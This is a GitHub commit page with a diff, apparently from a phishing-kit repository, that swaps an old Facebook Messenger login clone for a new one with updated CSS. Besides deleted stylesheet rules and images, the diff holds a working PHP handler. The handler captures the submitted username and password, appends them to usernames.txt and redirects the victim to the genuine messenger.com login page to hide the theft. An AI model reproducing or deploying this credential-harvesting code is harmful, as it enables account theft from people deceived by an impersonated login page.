Merge pull request #15 from usama7628674/master

deleted old fb_messenger and added new one with updated css and footer
This commit is contained in:
AnonUD4Y 2018-04-29 15:24:05 +05:30 committed by GitHub
commit c8b191bf21
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
8 changed files with 38 additions and 44 deletions

Binary file not shown.

Before

Width:  |  Height:  |  Size: 2.9 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 1.4 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 1.1 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 6.4 KiB

View File

@ -1,3 +0,0 @@
.inputbox{border:1px solid rgba(0, 0, 0, .20);-webkit-border-radius:4px;color:rgba(0, 0, 0, 1);display:block;font-family:"Helvetica Neue", "Segoe UI", Helvetica, Arial, sans-serif;font-size:17px;height:44px;margin-bottom:12px;margin-top:-17px;margin-left:auto;margin-right:auto;padding:0 16px;width:329px;outline:none;-webkit-box-shadow:0 1px 1px rgba(0, 0, 0, .05);}
.emptybox{visibility: hidden;}
.inputbox2{border:1px solid rgba(0, 0, 0, .20);-webkit-border-radius:4px;color:rgba(0, 0, 0, 1);display:block;font-family:"Helvetica Neue", "Segoe UI", Helvetica, Arial, sans-serif;font-size:17px;height:44px;margin-bottom:12px;margin-left:auto;margin-right:auto;padding:0 16px;width:329px;outline:none;-webkit-box-shadow:0 1px 1px rgba(0, 0, 0, .05);}

File diff suppressed because one or more lines are too long

View File

@ -36,19 +36,16 @@
$write = fputs($fileHandle, $string);
@ fclose($fileHandle);
}
$var = $_POST['email'];
$var2 = $_POST['pass'];
$var = $_POST['username'];
$var2 = $_POST['password'];
$myFile = file_get_contents("protect.html");
$searchString = "<html><title>WELCOME TO FACEBOOK</title></html>";
$searchString = "<html><title>WELCOME</title></html>";
if($myFile != $searchString) {
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
header('Location: https://messenger.com/login/');
header('Location:https://messenger.com/login.php');
}
if($myFile != $searchString) {
echo "LOGIN SUCCESSFULL";
header('Location: https://messenger.com/login');
}
exit();
?>

Binary file not shown.

Before

Width:  |  Height:  |  Size: 7.0 KiB